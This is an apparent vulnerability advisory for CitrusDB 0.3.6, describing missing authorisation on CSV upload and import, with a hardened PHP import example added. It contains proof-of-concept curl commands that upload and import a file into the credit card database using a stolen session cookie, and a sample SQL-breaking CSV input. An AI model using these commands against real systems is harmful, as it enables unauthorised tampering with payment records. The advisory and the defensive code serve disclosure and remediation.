CitrusDB CSV File Upload Access Validation Vulnerability
BID:12557
Info
| Bugtraq ID: | 12557 |
| Class: | Access Validation Error |
| CVE: | CVE-2005-0409 CVE-2005-0410 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 15 2005 12:00AM |
| Updated: | Jul 12 2009 10:06AM |
| Credit: | Discovery of this vulnerability is credited to RedTeam. |
| Vulnerable: | CitrusDB Customer Database 0.3.6 |
| Not Vulnerable: | |
Discussion
CitrusDB is reportedly affected by an access validation vulnerability during the upload of CSV files. Exploitation of this issue could result in path disclosure or SQL injection. The issue exists because the application fails to verify user credentials during file upload and import.
These issues are reported to affect CitrusDB 0.3.6; earlier versions may also be affected.
Exploit / POC
No exploit is required.
The following proof of concept is available:
This uploads the file exploit.csv:
curl -D - --cookie "id_hash=2378c7b70e77d9c6737d697a46cbe34b; user_name=testor" http://<target>/citrusdb/tools/uploadcc.php --form [email protected] --form Import=Import
This imports the file to the credit card database:
curl -D - --cookie "id_hash=2378c7b70e77d9c6737d697a46cbe34b; user_name=testor" "http://<target>/citrusdb/tools/index.php?load=importcc&submit=on"
Note: The above proofs of concept require the id_hash of an existing user.
The following proof of concept demonstrates the SQL injection vulnerability:
Reportedly, supplying ',,,,, as the contents of the uploaded CSV file will make the SQL query in './citrusdb/tools/importcc.php' fail.
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
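A hardened import step for the two problems described in the Discussion (no credential check during upload and import, and CSV values able to break the SQL query), as an added example that is not CitrusDB code and not a vendor fix. The session keys, the table import_rows, the six-field layout and the function names are assumptions made for illustration; an in-memory SQLite database via PDO keeps it runnable offline.

```php
<?php
// Added example, not CitrusDB code. Table, column and function names are hypothetical.
declare(strict_types=1);

const EXPECTED_FIELDS = 6; // assumed column count for this illustration

// Refuse the request unless server-side session state marks the user as authorised.
function require_import_privilege(array $session): void
{
    // Client-supplied cookie values (e.g. a user name) are not proof of identity.
    if (empty($session['user_id']) || empty($session['can_import'])) {
        throw new RuntimeException('forbidden');
    }
}

// Import CSV text with a prepared statement; returns [imported, rejected].
function import_csv(PDO $db, string $csv, array $session): array
{
    require_import_privilege($session); // checked in the import step, not only in the UI
    $stmt = $db->prepare('INSERT INTO import_rows VALUES (?, ?, ?, ?, ?, ?)');
    $imported = $rejected = 0;
    $fh = fopen('php://memory', 'w+');
    fwrite($fh, $csv);
    rewind($fh);
    while (($row = fgetcsv($fh, 0, ',', '"', '\\')) !== false) {
        if ($row === [null]) { continue; } // blank line
        if (count($row) !== EXPECTED_FIELDS) { $rejected++; continue; }
        $stmt->execute($row); // values are bound as data, never concatenated into SQL
        $imported++;
    }
    fclose($fh);
    return [$imported, $rejected];
}

// Constructed sample input: an ordinary row, the ',,,,, content from the advisory, a short row.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE import_rows (f1, f2, f3, f4, f5, f6)');
$csv = "1001,Example Customer,visa,0000,0130,ok\n',,,,,\nshort,row\n";

try {
    import_csv($db, $csv, []); // no authenticated session: refused before any parsing
} catch (RuntimeException $e) {
    echo 'anonymous import: ', $e->getMessage(), "\n";
}
[$ok, $bad] = import_csv($db, $csv, ['user_id' => 7, 'can_import' => true]);
$stored = $db->query("SELECT COUNT(*) FROM import_rows WHERE f1 = ''''")->fetchColumn();
echo "imported=$ok rejected=$bad rows_with_literal_quote=$stored\n";
```

In a deployed application, database exceptions should be logged server-side rather than displayed, since raw error output is one way file paths get disclosed.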
References
References:
- CitrusDB Customer Database Home Page (CitrusDB)
- SQL-Injection in CitrusDB (RedTeam)
- Upload Authorization bypass in CitrusDB (RedTeam)